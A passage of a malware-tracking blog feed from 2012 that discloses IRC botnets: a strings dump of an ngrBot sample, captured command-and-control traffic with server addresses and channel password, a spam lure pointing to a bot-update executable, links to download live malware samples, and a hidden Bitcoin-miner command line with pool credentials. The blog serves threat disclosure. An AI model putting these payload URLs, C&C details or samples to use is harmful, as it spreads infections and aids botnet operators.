/&gt;msn.int&lt;br /&gt;http.set&lt;br /&gt;http.int&lt;br /&gt;http.inj&lt;br /&gt;mdns&lt;br /&gt;stats&lt;br /&gt;speed&lt;br /&gt;logins&lt;br /&gt;slow&lt;br /&gt;ssyn&lt;br /&gt;stop&lt;br /&gt;F4XA&lt;br /&gt;gGWHXA&lt;br /&gt;5hXA&lt;br /&gt;ZpXA&lt;br /&gt;` WA&lt;br /&gt;f0WA&lt;br /&gt;u{A&amp;lt;WA&lt;br /&gt;[@WA&lt;br /&gt;PASS %s&lt;br /&gt;[.ShellClassInfo]&lt;br /&gt;CLSID={645FF040-5081-101B-9F08-00AA002F954E}&lt;br /&gt;USER %s 0 0 :%s&lt;br /&gt;NICK %s&lt;br /&gt;JOIN %s %s&lt;br /&gt;PART %s&lt;br /&gt;PRIVMSG %s :%s&lt;br /&gt;QUIT :%s&lt;br /&gt;PONG %s&lt;br /&gt;PING&lt;br /&gt;PRIVMSG&lt;br /&gt;[v=&amp;quot;%s&amp;quot; c=&amp;quot;%s&amp;quot; h=&amp;quot;%s&amp;quot; p=&amp;quot;%S&amp;quot;]&lt;br /&gt;[d=&amp;quot;%s&amp;quot; s=&amp;quot;%d bytes&amp;quot;] Updated bot file &amp;quot;%S&amp;quot; - Download retries: %d&lt;br /&gt;[d=&amp;quot;%s&amp;quot; s=&amp;quot;%d bytes&amp;quot;] Executed file &amp;quot;%S&amp;quot; - Download retries: %d&lt;br /&gt;[Slowloris]: Starting flood on &amp;quot;%s&amp;quot; for %d minute(s)&lt;br /&gt;[Slowloris]: Finished flood on &amp;quot;%s&amp;quot;&lt;br /&gt;[UDP]: Starting flood on &amp;quot;%s:%d&amp;quot; for %d second(s)&lt;br /&gt;[UDP]: Finished flood on &amp;quot;%s:%d&amp;quot;&lt;br /&gt;[SYN]: Starting flood on &amp;quot;%s:%d&amp;quot; for %d second(s)&lt;br /&gt;[SYN]: Finished flood on &amp;quot;%s:%d&amp;quot;&lt;br /&gt;[USB]: Infected %s&lt;br /&gt;[MSN]: Updated MSN spread message to &amp;quot;%s&amp;quot;&lt;br /&gt;[MSN]: Updated MSN spread inte&lt;br /&gt;rval to &amp;quot;%s&amp;quot;&lt;br /&gt;[HTTP]: Updated HTTP spread message to &amp;quot;%s&amp;quot;&lt;br /&gt;[HTTP]: Injected value is now %s.&lt;br /&gt;[HTTP]: Updated HTTP spread interval to &amp;quot;%s&amp;quot;&lt;br /&gt;[Visit]: Visited &amp;quot;%s&amp;quot;&lt;br /&gt;[DNS]: Blocked &amp;quot;%s&amp;quot;&lt;br /&gt;[usb=&amp;quot;%d&amp;quot; msn=&amp;quot;%d&amp;quot; http=&amp;quot;%d&amp;quot; total=&amp;quot;%d&amp;quot;]&lt;br /&gt;[ftp=&amp;quot;%d&amp;quot; pop=&amp;quot;%d&amp;quot; http=&amp;quot;%d&amp;quot; total=&amp;quot;%d&amp;quot;]&lt;br /&gt;[RSOCK4]: Started rsock4 on &amp;quot;%s:%d&amp;quot;&lt;br /&gt;[RSOCK4]: Stopped rsock4&lt;br /&gt;[d=&amp;quot;%s&amp;quot; s=&amp;quot;%d bytes&amp;quot;] Update error: MD5 mismatch (%s != %s)&lt;br /&gt;[d=&amp;quot;%s&amp;quot;] Error downloading file [e=&amp;quot;%d&amp;quot;]&lt;br /&gt;[d=&amp;quot;%s&amp;quot;] Error writing download to &amp;quot;%S&amp;quot; [e=&amp;quot;%d&amp;quot;]&lt;br /&gt;[d=&amp;quot;%s&amp;quot; s=&amp;quot;%d bytes&amp;quot;] Error creating process &amp;quot;%S&amp;quot; [e=&amp;quot;%d&amp;quot;]&lt;br /&gt;[d=&amp;quot;%s&amp;quot; s=&amp;quot;%d bytes&amp;quot;] File &amp;quot;%S&amp;quot; has an invalid binary type. [type=&amp;quot;%d&amp;quot;]&lt;br /&gt;[d=&amp;quot;%s&amp;quot;] Error getting temporary filename. [e=&amp;quot;%d&amp;quot;]&lt;br /&gt;[d='%s&amp;quot;] Error getting application data path [e=&amp;quot;%d&amp;quot;]&lt;br /&gt;[Visit]: Error visitng &amp;quot;%s&amp;quot;&lt;br /&gt;[FTP Login]: %s&lt;br /&gt;[POP3 Login]: %s&lt;br /&gt;[FTP Infect]: %s was iframed&lt;br /&gt;[HTTP Login]: %s&lt;br /&gt;[HTTP Traffic]: %s&lt;br /&gt;[Ruskill]: Detected File: &amp;quot;%s&amp;quot;&lt;br /&gt;[Ruskill]: Detected DNS: &amp;quot;%s&amp;quot;&lt;br /&gt;[Ruskill]: Detected Reg: &amp;quot;%s&amp;quot;&lt;br /&gt;[PDef+]: %s&lt;br /&gt;[DNS]: Blocked DNS &amp;quot;%s&amp;quot;&lt;br /&gt;[MSN]: %s&lt;br /&gt;[HTTP]: %s&lt;br /&gt;ftplog&lt;br /&gt;poplog&lt;br /&gt;ftpinfect&lt;br /&gt;httplogin&lt;br /&gt;httptraff&lt;br /&gt;ruskill&lt;br /&gt;rdns&lt;br /&gt;rreg&lt;br /&gt;httpspread&lt;br /&gt;http://api.wipmania.com/&lt;br /&gt;\\.\pipe\%08x_ipc&lt;br /&gt;0;0G0O0V0d0n0s0&lt;br /&gt;1)13181Y1e1u1&amp;#124;1&lt;br /&gt;2C2c2&lt;br /&gt;3 363M3j3u3&lt;br /&gt;6(6/686J6O6T6m6&lt;br /&gt;7 7(7O7V7_7&lt;br /&gt;7=8T8\8&lt;br /&gt;9#9:9W9^9f9~9&lt;br /&gt;98:R:[:&lt;br /&gt;;U&amp;lt;e&amp;lt;j&amp;lt;p&amp;lt;&lt;br /&gt;&amp;lt;g=o=&lt;br /&gt;&amp;gt;*&amp;gt;N&amp;gt;&lt;br /&gt;?%?/?6?A?P?&lt;br /&gt;0&amp;lt;0E0L0S0c0i0t0{0&lt;br /&gt;2!3-4d4n4s4&lt;br /&gt;5(5:5?5D5a5x5&lt;br /&gt;6 6J6a6&lt;br /&gt;7&amp;amp;7.7&amp;gt;7I7N7f7&lt;br /&gt;1#2_2&lt;br /&gt;8&amp;quot;8Q8X8g8q8&lt;br /&gt;9':;:Y:&lt;br /&gt;&amp;lt;'&amp;lt;1&amp;lt;H&amp;lt;X&amp;lt;x&amp;lt;&lt;br /&gt;=%=7=D=K=Z=w=}=&lt;br /&gt;&amp;gt;@&amp;gt;R&amp;gt;\&amp;gt;m&amp;gt;&lt;br /&gt;?1?&amp;lt;?B?j?&lt;br /&gt;0g0g1&lt;br /&gt;1&amp;quot;2Q2~2&lt;br /&gt;203N3&lt;br /&gt;424&amp;gt;4^4&lt;br /&gt;8;9~9&lt;br /&gt;:K:';A;_;&lt;br /&gt;&amp;lt;4&amp;lt;&amp;gt;&amp;lt;T&amp;lt;^&amp;lt;h&amp;lt;&lt;br /&gt;=*=&amp;gt;=D=N=l=u=&lt;br /&gt;&amp;gt;#&amp;gt;)&amp;gt;8&amp;gt;&amp;gt;&amp;gt;O&amp;gt;Y&amp;gt;^&amp;gt;p&amp;gt;u&amp;gt;&lt;br /&gt;?8?L?c?u?&lt;br /&gt;0$1-1H1N1_1n1&lt;br /&gt;313Y3k3&lt;br /&gt;414l4&lt;br /&gt;515B5P5u5&lt;br /&gt;676V6_6f6v6&lt;br /&gt;889Y9r9&lt;br /&gt;:-:G:&lt;br /&gt;;#;(;2;7;&amp;lt;;A;F;W;&lt;br /&gt;&amp;lt;5&amp;lt;?&amp;lt;^&amp;lt;&lt;br /&gt;&amp;lt;W=l=&amp;#124;=&lt;br /&gt;=d&amp;gt;o&amp;gt;{&amp;gt;&lt;br /&gt;?/?U?`?p?&lt;br /&gt;1P2T2X2&lt;br /&gt;3?4a4h4&lt;br /&gt;5A5H5&amp;#124;5&lt;br /&gt;7U8]8f8}8&lt;br /&gt;9'9-939q9&lt;br /&gt;: :%:n:&lt;br /&gt;;1;J;d;&lt;br /&gt;&amp;lt;%&amp;lt;3&amp;lt;&amp;lt;&amp;lt;B&amp;lt;i&amp;lt;v&amp;lt;&lt;br /&gt;=$=+=0===E=L=T=o=v=&lt;br /&gt;=6&amp;gt;E&amp;gt;&lt;br /&gt;?%?4?\?&lt;br /&gt;0'0K0\0s0x0}0&lt;br /&gt;091M1g1t1&lt;br /&gt;3[3q3&lt;br /&gt;3*494&lt;br /&gt;4-575w5~5&lt;br /&gt;5B6L6&lt;br /&gt;6(7I7]7z7&lt;br /&gt;848_9m9w9&lt;br /&gt;:+:1:7:D:Q:V:e:t:&lt;br /&gt;; ;,;8;L;Q;V;n;s;x;};&lt;br /&gt;;5&amp;lt;B&amp;lt;]&amp;lt;w&amp;lt;&lt;br /&gt;=5===B=N=S=g=l=&lt;br /&gt;5&amp;quot;6-6B6L6Q6c6u6&lt;br /&gt;7 70767=7L7R7&lt;br /&gt;94:{:&lt;br /&gt;'010&lt;br /&gt;1.1F1^1&lt;br /&gt;2(2&amp;gt;2P2b2t2&lt;br /&gt;4K5f5&lt;br /&gt;6=6K6Y6&lt;br /&gt;7*7/7L7S7r7&lt;br /&gt;8]8i8&lt;br /&gt;9+9;9A9G9d9q9w9}9&lt;br /&gt;9/:b:h:&lt;br /&gt;;!;S;`;h;s;&lt;br /&gt;;E&amp;lt;e&amp;lt;w&amp;lt;&lt;br /&gt;=.=&amp;lt;=A=F=L=R=k=u=&lt;br /&gt;&amp;gt;#&amp;gt;,&amp;gt;X&amp;gt;&lt;br /&gt;?-?\?y?&lt;br /&gt;42484T4`4f4&lt;br /&gt;4X5]5&amp;#124;5&lt;br /&gt;6-646D6Q6[6b6g6q6z6&lt;br /&gt;9 9&amp;amp;9&amp;lt;9G9R9W9\9q9v9&lt;br /&gt;9::G:M:b:j:z:&lt;br /&gt;;.;6;;;B;H;S;c;k;&lt;br /&gt;&amp;lt;+&amp;lt;F&amp;lt;T&amp;lt;`&amp;lt;&lt;br /&gt;=3=E=Q=&lt;br /&gt;&amp;gt;3&amp;gt;T&amp;gt;k&amp;gt;z&amp;gt;&lt;br /&gt;?Z?r?{?&lt;br /&gt;%0&amp;lt;0V0h0&lt;br /&gt;141&amp;gt;1l1&lt;br /&gt;3g3r3&lt;br /&gt;3\4c4&lt;br /&gt;5*585R5w5&lt;br /&gt;6!6&amp;lt;6R6a6&lt;br /&gt;7=7C7T7g7z7&lt;br /&gt;8-9L9w9&lt;br /&gt;9-:D:W:&lt;br /&gt;;#;4;:;T;Z;&lt;br /&gt;&amp;lt;#&amp;lt;(&amp;lt;-&amp;lt;2&amp;lt;7&amp;lt;P&amp;lt;j&amp;lt;w&amp;lt;&lt;br /&gt;=)=.=K=[=`=}=&lt;br /&gt;&amp;gt;+&amp;gt;I&amp;gt;V&amp;gt;[&amp;gt;s&amp;gt;z&amp;gt;&lt;br /&gt;?*?H?T?a?g?u?&lt;br /&gt;0,0J0Z0g0l0v0&lt;br /&gt;1%101=1C1I1W1s1y1&lt;br /&gt;2'212&amp;lt;2J2_2&lt;br /&gt;3&amp;quot;3@3P3V3&lt;br /&gt;4)4J4h4x4&lt;br /&gt;535Q5s5&lt;br /&gt;6!6.656D6S6`6m6z6&lt;br /&gt;7?7E7&lt;br /&gt;7'8,818[8w8&lt;br /&gt;8.9K9V9s9&lt;br /&gt;:':,:D:T:Y:r:&lt;br /&gt;;2;7;W;r;w;&amp;#124;;&lt;br /&gt;&amp;lt;$&amp;lt;5&amp;lt;&amp;lt;&amp;lt;F&amp;lt;N&amp;lt;b&amp;lt;&lt;br /&gt;=(=I=O=Z=r=&amp;#124;=&lt;br /&gt;&amp;gt;V&amp;gt;g&amp;gt;&amp;#124;&amp;gt;&lt;br /&gt;&amp;gt;#?h?&lt;br /&gt;0-070D0x0&lt;br /&gt;0@1G1&lt;br /&gt;132D2Z2p2&lt;br /&gt;3*343=3R3^3&lt;br /&gt;3-434=4F5P5]5&lt;br /&gt;536N6[6&lt;br /&gt;637B7U7d7q7&lt;br /&gt;818&amp;gt;8T8]8&amp;#124;8&lt;br /&gt;9T9`9o9u9z9&lt;br /&gt;:!:,:3:;:A:O:Y:f:l:r:&lt;br /&gt;;(;3;9;?;Q;];c;i;{;&lt;br /&gt;&amp;lt;&amp;amp;&amp;lt;3&amp;lt;8&amp;lt;G&amp;lt;T&amp;lt;Z&amp;lt;`&amp;lt;n&amp;lt;&lt;br /&gt;&amp;lt;,=3=A=G=W=w=&amp;#124;=&lt;br /&gt;&amp;gt;@&amp;gt;E&amp;gt;\&amp;gt;&lt;br /&gt;&amp;gt;W?`?&lt;br /&gt;010C0H0M0a0f0k0&lt;br /&gt;1 1$1&amp;lt;1M1U1&lt;br /&gt;1-2O2z2&lt;br /&gt;3I3Z3o3z3&lt;br /&gt;4&amp;quot;4'4&amp;lt;4U4_4t4z4&lt;br /&gt;575=5r5&amp;#124;5&lt;br /&gt;6(6=6P6m6z6&lt;br /&gt;7 767&amp;lt;7~7&lt;br /&gt;8A8F8Y8c8j8&lt;br /&gt;999C9&lt;br /&gt;:%:,:3:=:F:e:&lt;br /&gt;;+;=;D;X;];c;i;n;&lt;br /&gt;;.&amp;lt;4&amp;lt;;&amp;lt;@&amp;lt;e&amp;lt;p&amp;lt;w&amp;lt;&lt;br /&gt;=&amp;quot;=*=0=;=F=O=Z=b=g=v={=&lt;br /&gt;=7&amp;gt;N&amp;gt;W&amp;gt;]&amp;gt;&lt;br /&gt;&amp;gt;&amp;amp;?7?~?&lt;br /&gt;40;0A0Q0a0&lt;br /&gt;2)2A2[2&lt;br /&gt;2T3]3f5&lt;br /&gt;6F6Y6t6&lt;br /&gt;7I7Y7_7e7k7q7w7}7&lt;br /&gt;8*808;8~8&lt;br /&gt;9 9O9X9^9&lt;br /&gt;9$:0:Q:&lt;br /&gt;:&amp;amp;;2;8;F;&lt;br /&gt;&amp;lt;&amp;quot;&amp;lt;2&amp;lt;=&amp;lt;Q&amp;lt;W&amp;lt;i&amp;lt;&lt;br /&gt;=$=*=4=:=E=K=S=e=&lt;br /&gt;&amp;gt;;&amp;gt;I&amp;gt;&lt;br /&gt;?!?F?M?W?&lt;br /&gt;1$1&amp;lt;1I1[1g1&lt;br /&gt;2%2&amp;gt;2V2a2t2&amp;#124;2&lt;br /&gt;373E3M3a3l3&lt;br /&gt;3@4N4U4&lt;br /&gt;5/565&amp;lt;5R5k5&lt;br /&gt;666i6&lt;br /&gt;7.7M7&lt;br /&gt;8,818M8[8`8&lt;br /&gt;8?9R9&lt;br /&gt;:#:4:9:?:E:P:{:&lt;br /&gt;;#;B;U;[;b;r;&lt;br /&gt;&amp;lt;!&amp;lt;o&amp;lt;&lt;br /&gt;=$=;=C=N=S=X=i=n=s=}=&lt;br /&gt;&amp;gt;&amp;quot;&amp;gt;(&amp;gt;.&amp;gt;4&amp;gt;:&amp;gt;@&amp;gt;F&amp;gt;L&amp;gt;R&amp;gt;X&amp;gt;^&amp;gt;d&amp;gt;j&amp;gt;p&amp;gt;v&amp;gt;&amp;#124;&amp;gt;&lt;br /&gt;?B?H?N?T?Z?`?f?l?r?x?~?&lt;br /&gt;4 4$4(4,4044484&amp;lt;4@4D4H4L4P4T4X6\6`6h6l6p6t6x6&amp;#124;6&lt;br /&gt;7D7L7X7\7`7d7h7l7p7t7&lt;br /&gt;9(949@9L9X9d9p9&amp;#124;9&lt;br /&gt;:$:0:&amp;lt;:H:T:`:l:x:&lt;br /&gt;; ;$;(;,;0;4;8;&amp;lt;;@;D;H;L;P;T;X;\;`;d;h;&lt;br /&gt;4 4$4(4,4044484&amp;lt;4@4D4H4L4P4T4X4\4`4d4h4l4p4t4x4&amp;#124;4&lt;br /&gt;5 5$5(5,5054585&amp;lt;5@5D5H5L5P5T5X5\5`5d5h5l5p5t5x5&amp;#124;5&lt;br /&gt;6 6$6(6,6064686&amp;lt;6@6D6H6L6P6T6X6\6`6d6h6l6p6t6x6&amp;#124;6&lt;br /&gt;7 7$7(7,7074787&amp;lt;7@7D7H7L7P7T7X7\7`7d7h7l7p7t7x7&amp;#124;7&lt;br /&gt;8 8$8(8,8084888&amp;lt;8@8D8H8L8P8T8X8\8`8d8h8l8p8t8x8&amp;#124;8&lt;br /&gt;8 9,989D9P9\9h9x9&amp;#124;9&lt;br /&gt;: :(:,:0:8:&amp;lt;:@:X:`:d:h:l:p:x:&amp;#124;:&lt;br /&gt;; ;$;(;,;0;8;&amp;lt;;@;D;H;P;T;X;\;`;h;l;p;t;x;&lt;br /&gt;&amp;lt; &amp;lt;(&amp;lt;,&amp;lt;0&amp;lt;4&amp;lt;8&amp;lt;@&amp;lt;D&amp;lt;H&amp;lt;L&amp;lt;P&amp;lt;X&amp;lt;\&amp;lt;`&amp;lt;d&amp;lt;h&amp;lt;p&amp;lt;t&amp;lt;&amp;#124;&amp;lt;&lt;br /&gt;=(=0=8=@=H=T=\=d=l=&lt;br /&gt;&lt;br /&gt;Unicode Strings:&lt;br /&gt;---------------------------------------------------------------------------&lt;br /&gt;Ajjj&lt;br /&gt;jjjj&lt;br /&gt;jjjj&lt;br /&gt;jjjj&lt;br /&gt;$jjj&lt;br /&gt;Ajjj&lt;br /&gt;DBWIN&lt;br /&gt;\\.\pipe&lt;br /&gt;kernel32.dll&lt;br /&gt;ntdll.dll&lt;br /&gt;Internet Explorer\iexplore.exe&lt;br /&gt;autorun.inf&lt;br /&gt;pidgin.exe&lt;br /&gt;wlcomm.exe&lt;br /&gt;msnmsgr.exe&lt;br /&gt;msmsgs.exe&lt;br /&gt;flock.ex&lt;br /&gt;opera.exe&lt;br /&gt;chrome.exe&lt;br /&gt;ieuser.exe&lt;br /&gt;iexplore.exe&lt;br /&gt;firefox.exe&lt;br /&gt;HKCU\&lt;br /&gt;HKLM\&lt;br /&gt;Microsoft Unified Security Protocol Provider&lt;br /&gt;.ipconfig.exe&lt;br /&gt;verclsid.exe&lt;br /&gt;regedit.exe&lt;br /&gt;rundll32.exe&lt;br /&gt;cmd.exe&lt;br /&gt;regsvr32.exe&lt;br /&gt;l&amp;quot;%s&amp;quot; %S&lt;br /&gt;POST&lt;br /&gt;.exe&lt;br /&gt;lol.exe&lt;br /&gt;n127.0.0.1&lt;br /&gt;%s:Zone.Identifier&lt;br /&gt;wininet.dll&lt;br /&gt;secur32.dll&lt;br /&gt;ws2_32.dll&lt;br /&gt;:%S%S\Desktop.ini&lt;br /&gt;winlogon.exe&lt;br /&gt;explorer.exe&lt;br /&gt;Aadvapi32.dll&lt;br /&gt;urlmon.dll&lt;br /&gt;nspr4.dll&lt;br /&gt;dnsapi.dll&lt;br /&gt;Akernel23.dll&lt;br /&gt;y%s\%s.exe&lt;br /&gt;lsass.exe&lt;br /&gt;Shell&lt;br /&gt;Software\Microsoft\Windows\CurrentVersion\Run&lt;br /&gt;Software\Microsoft\Windows\CurrentVersion\Policies\System&lt;br /&gt;.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run&lt;br /&gt;&lt;br /&gt;&lt;/code&gt;&lt;/pre&gt;&lt;br /&gt;we have 2 new domains here&lt;br /&gt;&lt;br /&gt;rlz01jm.info not active yet &lt;br /&gt;rlz1lola.info active &lt;br /&gt;lalorlz1.info this is old domain allready posted in my blog&lt;br /&gt;&lt;br /&gt;Resolved : [rlz1lola.info] To [176.9.192.215]&lt;br /&gt;&lt;br /&gt;176.9.192.216 5236 PASS ROCKR  Botnet server here&lt;br /&gt;176.9.192.215   5236 PASS ROCKR  Botnet server here&lt;br /&gt;&lt;br /&gt;PRIVMSG #rockspread :[HTTP]: Updated HTTP spread message to "mira este videito de jlo desnuda http://www.endenter.com/IMG00359268.JPG pufff mamacita |"&lt;br /&gt;PRIVMSG #rockspread :[MSN]: Updated MSN spread message to "mira este videito de jlo desnuda http://www.endenter.com/IMG00359268.JPG pufff mamacita"&lt;br /&gt;PRIVMSG #ROCK :[DNS]: Blocked 0 domain(s) - Redirected 16 domain(s)&lt;br /&gt;PRIVMSG #ROCK :[d="http://www.endenter.com/wp-includes/css/update/30upjmrlzz.exe" s="116236 bytes"] Updated bot file "C:\Documents and Settings\UserName\Application Data\Wcxaxw.exe" - Download retries: 0&lt;br /&gt;NICK n{US|XPa}eovvenu&lt;br /&gt;USER eovvenu 0 0 :eovvenu&lt;br /&gt;JOIN #ROCK ngrBot&lt;br /&gt;JOIN #rockspread&lt;br /&gt;JOIN #US&lt;br /&gt;PRIVMSG #rockspread :[HTTP]: Updated HTTP spread interval to "4"&lt;br /&gt;PRIVMSG #rockspread :[MSN]: Updated MSN spread interval to "4"&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Now talking in #ROCK&lt;br /&gt;Topic On: [ #ROCK ] [ ,up http://www.endenter.com/wp-includes/css/update/31upjmrlzz.exe 9702091B21C1A48955A5268D07E31EF6 | ,mdns http://www.endenter.com/wp-includes/css/update/dos.txt ]&lt;br /&gt;Topic By: [ rockstar ]&lt;br /&gt;&lt;br /&gt;Download samples &lt;a href="http://de071be5.ultrafiles.net"&gt;here&lt;/a&gt; and &lt;a href="http://megaupper.com/files/FKCXKFYD/samples.zip"&gt;here&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.mirrorcreator.com/files/1TLFUITT/samples.zip_links"&gt;Download&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;hosting infos&lt;br /&gt;http://whois.domaintools.com/176.9.192.215&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-4916922528997001143?l=www.exposedbotnets.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.exposedbotnets.com/feeds/4916922528997001143/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.exposedbotnets.com/2012/02/rlz1lolainfongrbot-hosted-in-germany.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/4916922528997001143'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/4916922528997001143'/><link rel='alternate' type='text/html' href='http://www.exposedbotnets.com/2012/02/rlz1lolainfongrbot-hosted-in-germany.html' title='rlz1lola.info(ngrBot hosted in Germany Hetzner Online Ag)'/><author><name>Pig</name><uri>http://www.blogger.com/profile/14894907939553492625</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='12' src='http://1.bp.blogspot.com/-7kQ20oLo1uw/TsVtOg7LqTI/AAAAAAAAAIE/a6rHeP13RCU/s220/755d67fbce760704b19db198a6c7c97e.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2690706005301967154.post-3829556597622431583</id><published>2012-01-31T18:42:00.000+01:00</published><updated>2012-01-31T18:42:39.264+01:00</updated><title type='text'>31.31.76.89(irc botnet hosted in Czech Republic Wedos Internet A.s)</title><content type='html'>Remote Host Port Number&lt;br /&gt;31.31.76.89 6667&lt;br /&gt;&lt;br /&gt;PONG :A55A8CFA&lt;br /&gt;JOIN #blackout&lt;br /&gt;&lt;br /&gt;Now talking in #blackout&lt;br /&gt;Topic On: [ #blackout ] [ #blackout ]&lt;br /&gt;Topic By: [ JohnDoe ]&lt;br /&gt;Modes On: [ #blackout ] [ +sntru ]&lt;br /&gt;&lt;br /&gt;hosting infos:&lt;br /&gt;http://whois.domaintools.com/31.31.76.89&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-3829556597622431583?l=www.exposedbotnets.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.exposedbotnets.com/feeds/3829556597622431583/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.exposedbotnets.com/2012/01/31317689irc-botnet-hosted-in-czech.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/3829556597622431583'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/3829556597622431583'/><link rel='alternate' type='text/html' href='http://www.exposedbotnets.com/2012/01/31317689irc-botnet-hosted-in-czech.html' title='31.31.76.89(irc botnet hosted in Czech Republic Wedos Internet A.s)'/><author><name>Pig</name><uri>http://www.blogger.com/profile/14894907939553492625</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='12' src='http://1.bp.blogspot.com/-7kQ20oLo1uw/TsVtOg7LqTI/AAAAAAAAAIE/a6rHeP13RCU/s220/755d67fbce760704b19db198a6c7c97e.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2690706005301967154.post-2226587669524847041</id><published>2012-01-31T18:34:00.000+01:00</published><updated>2012-01-31T18:34:25.956+01:00</updated><title type='text'>46.166.162.116(irc botnet hosted in United Kingdom Santrex Internet Services Ltd)</title><content type='html'>46.166.162.116:8585&lt;br /&gt;&lt;br /&gt;nick  yycIaIc&lt;br /&gt;user    yudtouga&lt;br /&gt;&lt;br /&gt;channel #c&lt;br /&gt;&lt;br /&gt;Now talking in #c&lt;br /&gt;Topic On: [ #c ] [=b0ys1Gs9MhP2M38/SRY5UVNKt93lIg63DZ6HazYwEbYQAc+LvQLYRMp52xSH5wHeVdrdItvhP07jOf90YyPCLKO3nTZlyMhqT7MEydvpWg8CFUZL4zUDDT0xS+sjMxF90f9dpeF ]&lt;br /&gt;Topic By: [ rise ]&lt;br /&gt;&lt;br /&gt;hosting infos:&lt;br /&gt;http://whois.domaintools.com/46.166.162.116&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-2226587669524847041?l=www.exposedbotnets.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.exposedbotnets.com/feeds/2226587669524847041/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.exposedbotnets.com/2012/01/46166162116irc-botnet-hosted-in-united.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/2226587669524847041'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/2226587669524847041'/><link rel='alternate' type='text/html' href='http://www.exposedbotnets.com/2012/01/46166162116irc-botnet-hosted-in-united.html' title='46.166.162.116(irc botnet hosted in United Kingdom Santrex Internet Services Ltd)'/><author><name>Pig</name><uri>http://www.blogger.com/profile/14894907939553492625</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='12' src='http://1.bp.blogspot.com/-7kQ20oLo1uw/TsVtOg7LqTI/AAAAAAAAAIE/a6rHeP13RCU/s220/755d67fbce760704b19db198a6c7c97e.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2690706005301967154.post-6265736276543049091</id><published>2012-01-28T21:39:00.000+01:00</published><updated>2012-01-28T21:39:34.668+01:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Bitcoin Miner  Botnet'/><title type='text'>pool.dload.asia(Bitcoin Miner  Botnet hosted in France Paris Gandi)</title><content type='html'>Very big net here&lt;br /&gt;the gay behind the net is making alot of money from infected machines&lt;br /&gt;&lt;br /&gt;Resolved : [pool.dload.asia] To [95.142.174.210]&lt;br /&gt;Resolved : [pool.dload.asia] To [92.243.3.252]&lt;br /&gt;Resolved : [pool.dload.asia] To [95.142.175.27]&lt;br /&gt;Resolved : [pool.dload.asia] To [95.142.161.74]&lt;br /&gt;Resolved : [pool.dload.asia] To [95.142.174.205]&lt;br /&gt;Resolved : [pool.dload.asia] To [95.142.170.142]&lt;br /&gt;Resolved : [pool.dload.asia] To [95.142.174.64]&lt;br /&gt;Resolved : [pool.dload.asia] To [92.243.23.149]&lt;br /&gt;Resolved : [pool.dload.asia] To [95.142.164.83]&lt;br /&gt;&lt;br /&gt;miner.exe -a 60 -g yes -o http://pool.dload.asia:8332/ -u redem_check -p orneliassssssssss&lt;br /&gt;&lt;br /&gt;Default file&lt;br /&gt;&lt;pre style="font-family: Andale Mono, Lucida Console, Monaco, fixed, monospace; color: #000000; background-color: #eee;font-size: 12px;border: 1px dashed #999999;line-height: 14px;padding: 5px; overflow: auto; width: 100%"&gt;&lt;code&gt;{&lt;br /&gt;&amp;quot;error&amp;quot;: null,&lt;br /&gt;&amp;quot;id&amp;quot;: 1,&lt;br /&gt;&amp;quot;result&amp;quot;: {&lt;br /&gt;&amp;quot;data&amp;quot;: &amp;quot;0000000109493c65b0e150acd82397509a089d4b14bf209eb495e68d000007ca000000008e1dee82be4fd4caf0895d685a2c0d06c893f80fbfe007188bf829fcffa39f214f244f611a0cd43f00000000000000800000000000000000000000000000000000000000000000000000000000000000000000000000000080020000&amp;quot;,&lt;br /&gt;&amp;quot;hash1&amp;quot;: &amp;quot;00000000000000000000000000000000000000000000000000000000000000000000008000000000000000000000000000000000000000000000000000010000&amp;quot;,&lt;br /&gt;&amp;quot;midstate&amp;quot;: &amp;quot;a9bd1362c454c1d5018d6520d1ae43715b8a5fa336bdb902be4a5269a946f1b7&amp;quot;,&lt;br /&gt;&amp;quot;target&amp;quot;: &amp;quot;ffffffffffffffffffffffffffffffffffffffffffffffffffffffff00000000&amp;quot;&lt;br /&gt;}&lt;br /&gt;}&lt;br /&gt;&lt;/code&gt;&lt;/pre&gt;&lt;br /&gt;exe file&lt;br /&gt;&lt;a href="http://5c212ab5.urlbeat.net"&gt;Download&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;hosting infos:&lt;br /&gt;http://whois.domaintools.com/95.142.164.83&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-6265736276543049091?l=www.exposedbotnets.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' 